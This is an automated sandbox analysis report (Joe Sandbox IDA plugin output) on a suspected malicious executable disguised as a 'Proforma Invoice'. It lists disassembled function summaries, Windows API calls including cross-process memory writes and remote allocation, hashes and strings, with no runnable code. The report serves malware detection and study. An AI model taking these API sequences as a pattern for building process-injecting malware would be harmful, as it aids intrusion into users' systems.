                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                • String ID:
                                                                                                • API String ID: 4156661090-0
                                                                                                • Opcode ID: e9ea9499a75a814497a20b8eb3d48a3cef5c5ee0bcf157916e7206036594c524
                                                                                                • Instruction ID: 0bec895f2bbab19727f4832ab567a85c8a37a7a23d7bd490665d83c04f6c60a4
                                                                                                • Opcode Fuzzy Hash: e9ea9499a75a814497a20b8eb3d48a3cef5c5ee0bcf157916e7206036594c524
                                                                                                • Instruction Fuzzy Hash: 7821A135A00104EFD714EFA8DC89A9ABBF5EF48310F14C579F84997362CA38AC41CBA4
                                                                                                APIs
                                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006A134D
                                                                                                • SelectObject.GDI32(?,00000000), ref: 006A135C
                                                                                                • BeginPath.GDI32(?), ref: 006A1373
                                                                                                • SelectObject.GDI32(?,00000000), ref: 006A139C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                                • String ID:
                                                                                                • API String ID: 3225163088-0
                                                                                                • Opcode ID: 798706d15a926599c7bf496f08575464fa64d0899dcf0e3fea5378e560951e89
                                                                                                • Instruction ID: 7bcac705765c3633ab7e909b1864f81e68855c900bb3691f58d351dcf55a0bd7
                                                                                                • Opcode Fuzzy Hash: 798706d15a926599c7bf496f08575464fa64d0899dcf0e3fea5378e560951e89
                                                                                                • Instruction Fuzzy Hash: 4F213130800709DBDF219F15DC447AD7BA9EB02711F14C226E4519BAB0D7B99D92EF98
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00704ABA
                                                                                                • __beginthreadex.LIBCMT ref: 00704AD8
                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00704AED
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00704B03
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00704B0A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                • String ID:
                                                                                                • API String ID: 3824534824-0
                                                                                                • Opcode ID: 9c812f4c8e1bfd8f491601c941d4d120a7ed5b79788f704ce5bb603b1b69c9c3
                                                                                                • Instruction ID: eb80b04655ceb4f777b61dfac6cb83719d2feb486e8027fbb2baa207de932e9a
                                                                                                • Opcode Fuzzy Hash: 9c812f4c8e1bfd8f491601c941d4d120a7ed5b79788f704ce5bb603b1b69c9c3
                                                                                                • Instruction Fuzzy Hash: 0B11E5F6904218BFC7109BA8DC04A9A7FBDEB49324F148369F915D3290D6B9C90087A5
                                                                                                APIs
                                                                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006F821E
                                                                                                • GetLastError.KERNEL32(?,006F7CE2,?,?,?), ref: 006F8228
                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,006F7CE2,?,?,?), ref: 006F8237
                                                                                                • HeapAlloc.KERNEL32(00000000,?,006F7CE2,?,?,?), ref: 006F823E
                                                                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006F8255
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                • String ID:
                                                                                                • API String ID: 842720411-0
                                                                                                • Opcode ID: 86ba3dd4ff68daf6973d903d14f3b7f3736bbd9e9a6b0f3432edefcd254f51b7
                                                                                                • Instruction ID: 014fc55719180b4af3234764267e552f14dee9a253fec1c09cba9f28ba051650
                                                                                                • Opcode Fuzzy Hash: 86ba3dd4ff68daf6973d903d14f3b7f3736bbd9e9a6b0f3432edefcd254f51b7
                                                                                                • Instruction Fuzzy Hash: DC016971600208BFDB204FA6DC48DAB7BBDEF8A754B504479F909C3220DB319D11CAA0
                                                                                                APIs
                                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006F7044,80070057,?,?,?,006F7455), ref: 006F7127
                                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006F7044,80070057,?,?), ref: 006F7142
                                                                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006F7044,80070057,?,?), ref: 006F7150
                                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006F7044,80070057,?), ref: 006F7160
                                                                                                • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006F7044,80070057,?,?), ref: 006F716C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                • String ID:
                                                                                                • API String ID: 3897988419-0
                                                                                                • Opcode ID: e9cbfe3bc760c2e8f3382eb2a1ef16e7c8700aab71dbdba927bed6aeb726d1c8
                                                                                                • Instruction ID: 03f13f183f26c6c1061f3a3a5e51af68e7fd51ed3a3cb8a79dbbc815cbc58cc7
                                                                                                • Opcode Fuzzy Hash: e9cbfe3bc760c2e8f3382eb2a1ef16e7c8700aab71dbdba927bed6aeb726d1c8
                                                                                                • Instruction Fuzzy Hash: B0018F72601208BBDB218F64DC44BAABBBEEF44791F184074FE04D3220D735DD569BA0
                                                                                                APIs
                                                                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00705260
                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0070526E
                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00705276
                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00705280
                                                                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007052BC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                • String ID:
                                                                                                • API String ID: 2833360925-0
                                                                                                • Opcode ID: 69edb6586f68cea5f482e620241cf9b6aa02a066c8bbdac5a8d74d9a9383b3d3
                                                                                                • Instruction ID: 92f228dc4ecf14c7a253ad15b61104744bbb9804d211776aae9abe67af76cdea
                                                                                                • Opcode Fuzzy Hash: 69edb6586f68cea5f482e620241cf9b6aa02a066c8bbdac5a8d74d9a9383b3d3
                                                                                                • Instruction Fuzzy Hash: 43016D71D01A1DDBDF10EFE4D8485EEBBB8FF0D711F414266E941B2180CB3859619BA9
                                                                                                APIs
                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006F8121
                                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006F812B
                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006F813A
                                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006F8141
                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006F8157
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                • String ID:
                                                                                                • API String ID: 44706859-0
                                                                                                • Opcode ID: 77fd16c1119d9c8025e8a088e5755fcb77a1b12631b7f477d87f62b67f898600
                                                                                                • Instruction ID: c023a2f732710630c5ee4fac73e103b5c05d4c3dac0e0ad91ec4e1674eeae902
                                                                                                • Opcode Fuzzy Hash: 77fd16c1119d9c8025e8a088e5755fcb77a1b12631b7f477d87f62b67f898600
                                                                                                • Instruction Fuzzy Hash: 69F0AF70200309AFEB214FA4EC88EB73BBDEF4AB54B004139FA45C3250CB649C12DA60
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 006FC1F7
                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 006FC20E
                                                                                                • MessageBeep.USER32(00000000), ref: 006FC226
                                                                                                • KillTimer.USER32(?,0000040A), ref: 006FC242
                                                                                                • EndDialog.USER32(?,00000001), ref: 006FC25C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3741023627-0
                                                                                                • Opcode ID: 03e164201cb5f5a3d57e18fb9c3875192e0508ad9ab6e81c054f97da70b19681
                                                                                                • Instruction ID: 69616d2dc8e41a69718244741a392c35d916e7dc6a97bd07078a2e57f93987e1
                                                                                                • Opcode Fuzzy Hash: 03e164201cb5f5a3d57e18fb9c3875192e0508ad9ab6e81c054f97da70b19681
                                                                                                • Instruction Fuzzy Hash: 2E01A73040470C97EB305B50DD4EFA67779FB00B06F00426DE642A15E1D7E469499B54
                                                                                                APIs
                                                                                                • EndPath.GDI32(?), ref: 006A13BF
                                                                                                • StrokeAndFillPath.GDI32(?,?,006DB888,00000000,?), ref: 006A13DB
                                                                                                • SelectObject.GDI32(?,00000000), ref: 006A13EE
                                                                                                • DeleteObject.GDI32 ref: 006A1401
                                                                                                • StrokePath.GDI32(?), ref: 006A141C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                • String ID:
                                                                                                • API String ID: 2625713937-0
                                                                                                • Opcode ID: 783bd979e1e95fee84c7191dab1635c20e2498a2fb66f1dee9aec81f76d6e500
                                                                                                • Instruction ID: a8f7ed135cafe2fb4457d0bafabcfe354a6b41f1f15079af229114876c4830ff
                                                                                                • Opcode Fuzzy Hash: 783bd979e1e95fee84c7191dab1635c20e2498a2fb66f1dee9aec81f76d6e500
                                                                                                • Instruction Fuzzy Hash: 45F0CD30004709DBDB216F1AED4C7583BF5E742326F08C325E46A5A5F1C77949A6EF58
                                                                                                APIs
                                                                                                • CoInitialize.OLE32(00000000), ref: 0070C432
                                                                                                • CoCreateInstance.OLE32(00732D6C,00000000,00000001,00732BDC,?), ref: 0070C44A
                                                                                                  • Part of subcall function 006A7DE1: _memmove.LIBCMT ref: 006A7E22
                                                                                                • CoUninitialize.OLE32 ref: 0070C6B7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                • String ID: .lnk
                                                                                                • API String ID: 2683427295-24824748
                                                                                                • Opcode ID: 3c4c094c0e38013b71327dfca1e4cc2450aa131f74c91ece33026619adedf272
                                                                                                • Instruction ID: 62670ea2edb8c15f9686e8bb3aaa9a08196e1fdb984481c377f062f49a7fcd95
                                                                                                • Opcode Fuzzy Hash: 3c4c094c0e38013b71327dfca1e4cc2450aa131f74c91ece33026619adedf272
                                                                                                • Instruction Fuzzy Hash: D5A14CB1104205AFD740EF54C881EABB7E9FF86354F004A2DF1569B1A2DB71EE09CB66
                                                                                                APIs
                                                                                                  • Part of subcall function 006C0DB6: std::exception::exception.LIBCMT ref: 006C0DEC
                                                                                                  • Part of subcall function 006C0DB6: __CxxThrowException@8.LIBCMT ref: 006C0E01
                                                                                                  • Part of subcall function 006A7DE1: _memmove.LIBCMT ref: 006A7E22
                                                                                                  • Part of subcall function 006A7A51: _memmove.LIBCMT ref: 006A7AAB
                                                                                                • __swprintf.LIBCMT ref: 006B2ECD
                                                                                                Strings
                                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 006B2D66
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                • API String ID: 1943609520-557222456
                                                                                                • Opcode ID: 8fe7a177d186e5cbb65bcbd61644cccce9d838afecdc23daddc6be3ca42f2614
                                                                                                • Instruction ID: 494f6ec6dbc13262f083ff2865246cc404a4e9501daf67e08c43b656b2468dfc
                                                                                                • Opcode Fuzzy Hash: 8fe7a177d186e5cbb65bcbd61644cccce9d838afecdc23daddc6be3ca42f2614
                                                                                                • Instruction Fuzzy Hash: C6917A711183029FC754FF24C895DAFB7EAEF96350F00491EF4869B2A1EA20ED45CB66
                                                                                                APIs
                                                                                                  • Part of subcall function 006A4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006A4743,?,?,006A37AE,?), ref: 006A4770
                                                                                                • CoInitialize.OLE32(00000000), ref: 0070B9BB
                                                                                                • CoCreateInstance.OLE32(00732D6C,00000000,00000001,00732BDC,?), ref: 0070B9D4
                                                                                                • CoUninitialize.OLE32 ref: 0070B9F1
                                                                                                  • Part of subcall function 006A9837: __itow.LIBCMT ref: 006A9862
                                                                                                  • Part of subcall function 006A9837: __swprintf.LIBCMT ref: 006A98AC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                • String ID: .lnk
                                                                                                • API String ID: 2126378814-24824748
                                                                                                • Opcode ID: e9924beea13323ce59e98473b8da6af32a198cad846e47de38c501193a59dbd7
                                                                                                • Instruction ID: e08a5c3addc87a0aad11f88ca4dcf0da1b827bb2e1837f16696e8dcbd77e8827
                                                                                                • Opcode Fuzzy Hash: e9924beea13323ce59e98473b8da6af32a198cad846e47de38c501193a59dbd7
                                                                                                • Instruction Fuzzy Hash: 01A126756042059FC710EF24C884D6AB7E6FF8A314F148A5CF8999B3A2CB35ED46CB91
                                                                                                APIs
                                                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 006FB4BE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContainedObject
                                                                                                • String ID: AutoIt3GUI$Container$%s
                                                                                                • API String ID: 3565006973-997058768
                                                                                                • Opcode ID: c90f3fc06e85ccfd933d5e93fc284a61e1115d4a4866e62a2ca287bdb8df4462
                                                                                                • Instruction ID: 2f4aa7f3a3cd38efbbc37504b332990afa408c6615a91a5e3aa96e824fa51619
                                                                                                • Opcode Fuzzy Hash: c90f3fc06e85ccfd933d5e93fc284a61e1115d4a4866e62a2ca287bdb8df4462
                                                                                                • Instruction Fuzzy Hash: 2C915971200605AFDB54DF68C884BAAB7EAFF49700F20946DFA4ACB391DB74E841CB50
                                                                                                APIs
                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 006C50AD
                                                                                                  • Part of subcall function 006D00F0: __87except.LIBCMT ref: 006D012B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorHandling__87except__start
                                                                                                • String ID: pow
                                                                                                • API String ID: 2905807303-2276729525
                                                                                                • Opcode ID: 6c272330ce17c6dbd2d11f6a58ff68e915f555923afa92efed9beedce7491539
                                                                                                • Instruction ID: 20e4e8272aa720beb41af0fa4b7981818b050df32f48575e7c06f6a871951507
                                                                                                • Opcode Fuzzy Hash: 6c272330ce17c6dbd2d11f6a58ff68e915f555923afa92efed9beedce7491539
                                                                                                • Instruction Fuzzy Hash: 65514B71E0960196FB157714CC057FE2B97EB40700F24895EE4D7C6399EE389EC4DA8A
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID: 3ck$_k
                                                                                                • API String ID: 4104443479-2131593748
                                                                                                • Opcode ID: c544ed40e77460065e0e2b7f2354d5f9fd6b0d423b805f2fc940b64e570a51fd
                                                                                                • Instruction ID: d7a191b7320d435cce64450e71db8d20039e97f78dc4554edc81e0b2d2ac3746
                                                                                                • Opcode Fuzzy Hash: c544ed40e77460065e0e2b7f2354d5f9fd6b0d423b805f2fc940b64e570a51fd
                                                                                                • Instruction Fuzzy Hash: 1E518DB0901645DFCB60CF69C880AEEB7B2FF44304F24852AE85AD7351EB35A996CB51
                                                                                                APIs
                                                                                                  • Part of subcall function 007014BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006F9296,?,?,00000034,00000800,?,00000034), ref: 007014E6
                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 006F983F
                                                                                                  • Part of subcall function 00701487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006F92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 007014B1
                                                                                                  • Part of subcall function 007013DE: GetWindowThreadProcessId.USER32(?,?), ref: 00701409
                                                                                                  • Part of subcall function 007013DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,006F925A,00000034,?,?,00001004,00000000,00000000), ref: 00701419
                                                                                                  • Part of subcall function 007013DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,006F925A,00000034,?,?,00001004,00000000,00000000), ref: 0070142F
                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006F98AC
                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006F98F9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
